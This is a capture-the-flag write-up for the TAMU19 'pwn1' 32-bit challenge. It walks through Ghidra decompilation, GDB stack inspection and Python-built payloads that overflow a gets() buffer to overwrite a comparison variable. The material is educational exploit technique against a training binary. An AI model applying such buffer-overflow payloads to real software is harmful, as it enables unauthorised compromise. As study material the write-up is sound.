Tamu19 pwn1 (32-bit)

nightmare/modules/04-bof_variable/tamu19_pwn1/pwn1 at master · guyinatuxedo/nightmareGitHub

1. Analysis

1.1 Basic

$ file pwn1
pwn1: ELF 32-bit LSB pie executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=d126d8e3812dd7aa1accb16feac888c99841f504, not stripped

$ pwn checksec pwn1
[*] '/home/jarrettgxz/ghidra-projs/pwn1'
    Arch:     i386-32-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

$ ./pwn1
Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
What... is your name?
hello # input
I don't know that! Auuuuuuuugh!

• This tells us that it is a 32-bit ELF

• The following security are implemented:

  • RELRO

  • No-eXecute (NX) enabled

  • PIE enabled

1.2 Ghidra

main function (Decompile view)

/* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */
/* WARNING: Globals starting with '_' overlap smaller symbols at the same address */

undefined4 main(void)

{
  int iVar1;
  char local_43 [43];
  int local_18;
  undefined4 local_14;
  undefined1 *local_10;
  
  local_10 = &stack0x00000004;
  setvbuf(_stdout,(char *)0x2,0,0);
  local_14 = 2;
  local_18 = 0;
  puts(
      "Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other  side he see."
      );
  puts("What... is your name?");
  fgets(local_43,0x2b,_stdin);
  iVar1 = strcmp(local_43,"Sir Lancelot of Camelot\n");
  if (iVar1 != 0) {
    puts("I don\'t know that! Auuuuuuuugh!");
                    /* WARNING: Subroutine does not return */
    exit(0);
  }
  puts("What... is your quest?");
  fgets(local_43,0x2b,_stdin);
  iVar1 = strcmp(local_43,"To seek the Holy Grail.\n");
  if (iVar1 != 0) {
    puts("I don\'t know that! Auuuuuuuugh!");
                    /* WARNING: Subroutine does not return */
    exit(0);
  }
  puts("What... is my secret?");
  gets(local_43);
  if (local_18 == -0x215eef38) {
    print_flag();
  }
  else {
    puts("I don\'t know that! Auuuuuuuugh!");
  }
  return 0;
}

Refined main function

/* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */
/* WARNING: Globals starting with '_' overlap smaller symbols at the same address */

undefined4 main(void)

{
  int strCompRes0;
  int strCompRes1;
  
  char input [43];
  int target;
  undefined4 local_14;
  undefined1 *local_10;
  
  local_10 = &stack0x00000004;
  setvbuf(_stdout,(char *)0x2,0,0);
  local_14 = 2;
  target = 0;
  puts(
      "Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other  side he see."
      );
  puts("What... is your name?");
  fgets(input,0x2b,_stdin);
  strCompRes0 = strcmp(input,"Sir Lancelot of Camelot\n");
  if (strCompRes0 != 0) {
    puts("I don\'t know that! Auuuuuuuugh!");
                    /* WARNING: Subroutine does not return */
    exit(0);
  }
  puts("What... is your quest?");
  fgets(input,0x2b,_stdin);
  strCompRes1 = strcmp(input,"To seek the Holy Grail.\n");
  if (strCompRes1 != 0) {
    puts("I don\'t know that! Auuuuuuuugh!");
                    /* WARNING: Subroutine does not return */
    exit(0);
  }
  puts("What... is my secret?");
  gets(input);
  if (target == -0x215eef38) {
    print_flag();
  }
  else {
    puts("I don\'t know that! Auuuuuuuugh!");
  }
  return 0;
}

Assuming that all the inputs passes the checks, the program will initially read in 0x2b bytes of inputs twice into the input variable using the fgets function, and a final input into the same variable using the gets function. Since the gets function simply reads the input until a newline character or EOF is encountered, this means that we can overflow the buffer allocated to the input and overwrite subsequent portions of the memory.

From the variables listing, we know that the input variable has an offset of 0x43-0x18=0x2b from the target variable.

I will skip the explanation of the rest of the deassembled/decompiled code regarding the comparisons, and the reading of the flag value. Instead, I would like to focus on the calling conventions and analysis of the 32-bit architecture with GDB

1.3 GDB

$ gdb pwn1

gdb> starti
gdb> disass main
Dump of assembler code for function main:
...
0x565558a9 <+304>:   push   eax
0x565558aa <+305>:   call   0x56555520 <gets@plt>
0x565558af <+310>:   add    esp,0x10
0x565558b2 <+313>:   cmp    DWORD PTR [ebp-0x10],0xdea110c8
...

The following instruction corresponds to the following line in the decompiled code:

  gets(input);
  if (target == -0x215eef38) {
   ...

Lets focus on the push instruction on line 0x565558a9. Recall that for x86 (32-bit) systems, function arguments are pushed via the stack. In this case, the argument value is temporarily stored in the eax register before it is pushed to the stack

gdb> break *0x565558a9
gdb> run
What... is your name?
Sir Lancelot of Camelot
What... is your quest?
To seek the Holy Grail.

gdb> info r eax
eax            0xffffccbd          -13123

• We can see that the eax is currently storing the value 0xffffccbd

• Viewing the contents of the said address in stack, we can see that the first 3 bytes contains the value 0x206f54.

• Execute the next instruction

gdb> nexti

• We can see now that the value 0xffffccbd is pushed to the stack

• Now, lets analyse the next instruction (gets function)

• To make it simple, lets create an input binary, and set a breakpoint to right after the last instruction and restart the program

From analysis of the source code in Ghidra, we know that we are required to input the values Sir Lancelot of Camelot\n and To seek the Holy Grail.\n to the initial 2 inputs. Following, we can input a crafted payload to overwrite a portion of memory to bypass the checks.

We can use the following commands to create an input binary which simply overwrites the required portion of memory with \x12\x34\x56\x78:

$ python3 - << 'EOF' > pwn1.bin
import sys

sys.stdout.buffer.write(b"Sir Lancelot of Camelot\n")
sys.stdout.buffer.write(b"To seek the Holy Grail.\n")

payload=b""
payload+=b'\x12\x34\x56\x78'
sys.stdout.buffer.write(payload)
EOF

gdb> delete breakpoints
gdb> break *0x565558af
gdb> run < pwn1.bin

• Now, we can see that the value at 0xffffccbd (3 character from right of the 0xffffccbc line) contains the value 0x563412

Note that the stack view shows the MSB -> LSB from left -> right

• In this case, 0x12 is the LSB (lower address), while 0x56 is at the MSB (higher address)

gdb> x/4xb 0xffffccbd
0xffffccbd:     0x12    0x34    0x56    0x78

Creating a test payload

• Notice that the offset value (between the input and compare) 0x2b is equals to 43 in decimal, which is the size declared in the decompiled C code:

char input [43];

• We can modify the python script to append additional 0x2b bytes of payload in the beginning:

$ python3 - << 'EOF' > pwn1.bin
import sys

sys.stdout.buffer.write(b"Sir Lancelot of Camelot\n")
sys.stdout.buffer.write(b"To seek the Holy Grail.\n")

payload=b""
payload=b'0'*0x2b
payload+=b'\x12\x34\x56\x78'
sys.stdout.buffer.write(payload)
EOF

• The first 3 bytes at address 0xffffccbd now contains the value 0x303030 which is simply the string 000

• Further analysis of the contents presents us with the full picture

gdb> run < pwn1.bin
gdb> x/6xg 0xffffccbb
0xffffccbb:     0x303030303030d500      0x3030303030303030
0xffffcccb:     0x3030303030303030      0x3030303030303030
0xffffccdb:     0x3030303030303030      0x5634123030303030

As expected, we have overwritten 0x2b bytes of memory with 0x30s.

• We can see the value 0x563412 at the bottom right, this corresponds to the address of the target variable for which we have overwritten

Remember the stack view: MSB -> LSB as noted before

gdb> p/x 0xffffccbd+0x2b # calculate address of the "target" variable
$1 = 0xffffcce8

gdb> x/4xb $1
0xffffcce8:     0x12    0x34    0x56    0x78